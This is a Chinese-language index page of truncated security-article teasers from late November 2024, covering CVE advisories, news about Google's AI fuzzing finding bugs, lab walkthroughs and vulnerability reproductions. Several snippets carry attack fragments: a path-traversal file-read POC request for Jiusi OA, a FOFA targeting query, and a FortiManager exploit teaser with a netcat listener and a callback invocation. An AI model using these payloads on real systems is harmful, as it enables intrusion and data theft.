Ubuntu发行版修复5个本地提权漏洞,已潜伏10年;AI自动挖洞不是梦,谷歌AI工具OSS-FASZ又发现26个开源漏洞 黑白之道 2024-11-23 01:23 Ubuntu发行版修复5个本地提权漏洞,已潜伏10年; 11 月 22 日消息,科技媒体 bleepingcomputer 于 11 月 20 日发布博文,报道称 Ubuntu Linux 发行版中潜伏 10 年的漏洞被发现,攻击者
继续阅读漏洞预警 | D-Link NAS设备远程代码执行漏洞 浅安 浅安安全 2024-11-22 23:50 0x00 漏洞编号 – # CVE-2024-10915 0x01 危险等级 – 高危 0x02 漏洞概述 D-Link NAS设备是一类专门设计用于家庭和小型企业的网络存储设备。 0x03 漏洞详情 CVE-2024-10915 漏洞类型: 命令注入 影响: 执行任意
继续阅读漏洞预警 | Palo Alto Networks Expedition命令注入、SQL注入和明文存储漏洞 浅安 浅安安全 2024-11-22 23:50 0x00 漏洞编号 – # CVE-2024-9463 CVE-2024-9464 CVE-2024-9465 CVE-2024-9466 0x01 危险等级 – 高危 0x02 漏洞概述 Palo Alto Netw
继续阅读漏洞预警 | PostgreSQL代码执行漏洞 浅安 浅安安全 2024-11-22 23:50 0x00 漏洞编号 – # CVE-2024-10979 0x01 危险等级 – 高危 0x02 漏洞概述 PostgreSQL是一个免费的对象-关系数据库服务器,它的Slogan是“世界上最先进的开源关系型数据库”。它具有强大的功能、稳定的性能、高度的可扩展性和丰富的数据类型
继续阅读ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略 原创 仙草里没有草噜丶 泷羽Sec 2024-11-22 23:40 ~ 不辞青山,相随与共~ 开箱即用!265种windows渗透工具合集–灵兔宝盒 渗透测试中新手必练的15个靶场 ### 靶场搭建 靶机下载 靶场一套下来共20多G,夸克下载(新用户只要三块)官网的百度不行新用户贵。。: https:/
继续阅读【未公开】HertzBeat(赫兹跳动) 开源实时监控系统存在默认口令漏洞 xiachuchunmo 银遁安全团队 2024-11-22 23:04 需要EDU SRC邀请码的师傅可以私聊后台,免费赠送EDU SRC邀请码(邀请码管够) 漏洞简介 **HertzBeat(赫兹跳动) 是一个开源实时监控系统,无需Agent,性能集群,兼容Prometheus,自定义监控和状态页构建能力。HertzB
继续阅读【DVWA】RCE远程命令执行实战 原创 儒道易行 儒道易行 2024-11-22 18:00 遇到挑战跟挫折的时侯,我有一个坚定的信念,我可以断气,但绝不能放弃 0.Command Injection(介绍) 命令注入(Command Injection) 是一种安全漏洞,攻击者通过将恶意的命令插入到应用程序或系统的输入中,从而执行未经授权的操作。它通常发生在应用程序允许用户输入某些参数,然后将
继续阅读通达OA前台任意用户登录漏洞复现 WIN哥学安全 2024-11-22 14:37 点击上方 蓝字关注我们 免责声明: 由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 漏洞描述 通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻
继续阅读一次JS接口到通用信息泄露漏洞 宓湫 UF安全团队 2024-11-22 12:22 经典登入框 开局熟悉经典登入框: 常规sql,xss,万能密码,弱口令,逻辑等等尝试无果 findsomething :打开插件看看匹配到的js接口 当然这里js相关工具建议使用findsomething以及Packer-Fuzzer-master等综合利用去重在进行拼接等操作 JS对抗 拿到上面的js接口,先直
继续阅读AI自动挖洞不是梦,谷歌AI工具OSS-FASZ发现26个开源漏洞 bug胤 FreeBuf 2024-11-22 11:30 谷歌透露,基于人工智能的模糊工具OSS-Fuzz 已被用于帮助识别各种开源代码库中的26个漏洞,包括 OpenSSL 加密库中的一个中度漏洞。这一事件代表了自动化漏洞发现的一个里程碑:每个漏洞都是使用AI发现的,利用AI生成和增强的模糊测试目标。 提到的OpenSSL漏洞
继续阅读漏洞盒子特供服务:组建“白帽全明星红队”,企业攻防演练定向“星”选择 诸葛象 FreeBuf 2024-11-22 11:30 “网络安全的本质在对抗,对抗的本质在攻防两端能力较量。”近几年攻防演练趋向常态化,受到各行各业的高度重视,快速成为检验和持续促进企业安全水平的常规手段。 然而面对的紧迫攻防形势,安全厂商可支配的红队(攻击队)资源有限, 具有丰富实战经验的优秀红队人才往往 供不应求, 而不
继续阅读【安全圈】AI自动挖洞不是梦,谷歌AI工具OSS-FASZ又发现26个开源漏洞 安全圈 2024-11-22 11:04 关键词 安全漏洞 谷歌透露,其基于人工智能的模糊工具OSS-Fuzz 已被用于帮助识别各种开源代码库中的26个漏洞,包括 OpenSSL 加密库中的一个中度漏洞。这一事件代表了自动化漏洞发现的一个里程碑:每个漏洞都是使用AI发现的,利用AI生成和增强的模糊测试目标。 提到的Op
继续阅读【漏洞通告】NVIDIA Base Command Manager身份验证缺失漏洞(CVE-2024-0138) 启明星辰安全简讯 2024-11-22 08:48 一、漏洞概述 漏洞名称 NVIDIA Base Command Manager身份验证缺失漏洞 CVE ID CVE-2024-0138 漏洞类型 身份验证缺失 发现时间 2024-11-22 漏洞评分 9.8 漏洞等级 高危
继续阅读九思OA dl.jsp 任意文件读取漏洞复现及POC 原创 CatalyzeSec CatalyzeSec 2024-11-22 08:43 FOFA body="/jsoa/login.jsp" 漏洞复现 将payload进行base64编码 POC POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtb
继续阅读什么!这条PoC/EXP的作者竟是? 原创 Chili GobySec 2024-11-22 08:00 不知道有没有细心的师傅发现,在今天我们的例行更新的漏洞列表中,有个漏洞被打上了一个神秘的标签。 想必大家已经猜到了,这条是首个由Goby安全社区的新成员—AI Bot所创作编写的PoC/EXP。给Goby提交过漏洞的同学都知道,每一个Goby的漏洞上线,都需要经过层层审核,不止是PoC的检测逻
继续阅读7zip 远程代码执行漏洞预警,需手动更新 二道情报贩子 2024-11-22 07:10 7-zip zstandard 解压缩整数下溢远程代码执行漏洞 CVE 编号 CVE-2024-11477漏洞 CVSS 评分 7.8 漏洞详情 此漏洞允许远程攻击者在受影响的 7-Zip 安装上执行任意代码。要利用此漏洞,需要与此库交互,但攻击媒介可能因实施而异。 具体缺陷存在于 Zstandard 解压
继续阅读苹果修复了在英特尔 Mac 攻击中使用的两个零日漏洞 胡金鱼 嘶吼专业版 2024-11-22 06:01 本周,苹果发布了紧急安全更新提示,用于修复两个零日漏洞,这些漏洞针对英特尔的 Mac 系统攻击。据了解,这些是在 macOS 的 macOS Sequoia JavaScriptCore (CVE-2024-44308) 和 WebKit (CVE-2024-44309) 组件中发现的。 J
继续阅读十年前的本地提权漏洞影响Ubuntu的needrestart软件 鹏鹏同学 黑猫安全 2024-11-22 04:15 Qualys威胁研究单元(TRU)发现了needrestart软件包中的五个十年前的本地提权漏洞,这些漏洞可能允许本地攻击者在不需要用户交互的情况下获得root权限。needrestart软件包在Ubuntu中是一个utility,旨在确保系统稳定性在软件更新后。 当更新包特别是
继续阅读某微信万能门店小程序系统存在前台SQL注入漏洞 原创 Mstir 星悦安全 2024-11-22 03:42 点击上方 蓝字 关注我们 并设为 星标 0x00 前言 █ 远山起风又起雾 无人知我来时路 █ 万能门店小程序DIY建站无限独立版非微擎应用,独立版是基于国内很火的ThinkPHP5框架开发的,适用于各行各业小程序、企业门店小程序! 万能门店微信小程序不限制小程序生成数量,支持多页面,
继续阅读【漏洞复现】某平台-AdjustWorkHours-sql注入漏洞 原创 南极熊 SCA御盾 2024-11-22 03:02 关注SCA御盾共筑网络安全 (文末见星球活动) SCA御盾实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直
继续阅读谷歌 AI Fuzz 工具 OSS-Fuzz 发现 26 个零日漏洞 龙猫 星尘安全 2024-11-22 02:02 谷歌透露,其人工智能驱动的模糊测试工具 OSS-Fuzz 已被用于帮助识别各种开源代码存储库中的 26 个漏洞,包括 OpenSSL 加密库中的一个中危漏洞。 “这些特定的漏洞代表了自动化漏洞挖掘的一个里程碑:每个漏洞都是通过 AI 发现的,使用 AI 生成和增强的fuzz目标,
继续阅读SD-WebUI未公开的0Day漏洞 原创 ki9mu OneTS安全团队 2024-11-22 02:00 点击蓝字 关注我们 声明 本文属于OneTS安全团队成员ki9mu的原创文章,转载请声明出处!本文章仅用于学习交流使用,因利用此文信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,OneTS安全团队及文章作者不为此承担任何责任。 SD-WebUI介绍 Stable Diffusi
继续阅读上周关注度较高的产品安全漏洞(20241111-20241117) 中国电信安全 2024-11-22 01:22 一、境外厂商产品漏洞 1、Google Pixel越界读取漏洞 Google Pixel是美国谷歌(Google)公司的一款智能手机。Google Pixel存在越界读取漏洞,该漏洞源于缺少边界检查,攻击者可利用该漏洞越界读取本地信息。 参考链接: https://www.cnvd.
继续阅读CVE-2024-47575 Fortinet FortiManager RCE exp(FortiJump) 云梦DC 云梦安全 2024-11-22 01:11 漏洞利用方法 首先,建立您的 ncat 会话: nc -lvvnp 80 然后,执行我们的检测工件生成器: python3 CVE-2024-47575.py–target192.168.1.110–lhost192.168.1.
继续阅读【漏洞复现】九思OA dl任意文件读取漏洞 原创 清风 白帽攻防 2024-11-22 01:07 免责声明:请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 简介 九思OA产品由北京九思协同软件有限公司(简称九思软件)研发,专为企事业单位和政府机关提供高端协同办公解决方案,助
继续阅读与俄罗斯有关的 TAG-110 组织利用 HATVIBE 和 CHERRYSPY 瞄准亚洲和欧洲 会杀毒的单反狗 军哥网络安全读报 2024-11-22 01:01 导读 I nsikt Group 研究人员发现,俄罗斯正在开展一项网络间谍活动,该活动使用定制恶意软件,针对中亚、东亚和欧洲的人权组织、私人保安公司以及国家和教育机构。 这些攻击被归咎于一个被追踪为 TAG-110 的威胁组织。 根据
继续阅读谷歌人工智能模糊测试工具AI OSS-Fuzz在开源项目中发现 26 个漏洞 会杀毒的单反狗 军哥网络安全读报 2024-11-22 01:01 导读 谷歌透露,其人工智能模糊测试工具 OSS-Fuzz 已被用于帮助识别各种开源代码存储库中的 26 个漏洞,包括 OpenSSL 加密库中的一个中等严重程度的漏洞。 谷歌开源安全团队在一篇博客文章中表示:“这些特殊的漏洞代表了自动漏洞查找的一个里程碑
继续阅读安全巨头惊爆0day漏洞危机:2023年最频繁攻击源揭秘! 安小圈 2024-11-22 00:45 安小圈 第551期 0day漏洞 五眼联盟的网络机构发现,最近一系列网络攻击中,攻击者使用的最后5个安全漏洞均出自Citrix、Cisco和Fortinet等公司的产品。 五眼联盟的网络安全官员周二发布的一份报告中指出,去年大部分被利用的漏洞属于零日漏洞,其数量比2022年有所增加。2022年,这
继续阅读唯徳知识产权管理系统WSFM.asmx接口处存在任意文件上传漏洞【漏洞复现|附nuclei-POC】 原创 kingkong 脚本小子 2024-11-22 00:32 免责声明: 本文内容仅供技术学习参考,请勿用于违法破坏。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,与作者无关。如有侵权请联系删除。 漏洞描述: 唯徳知识产权管理系统WSFM.asmx接口
继续阅读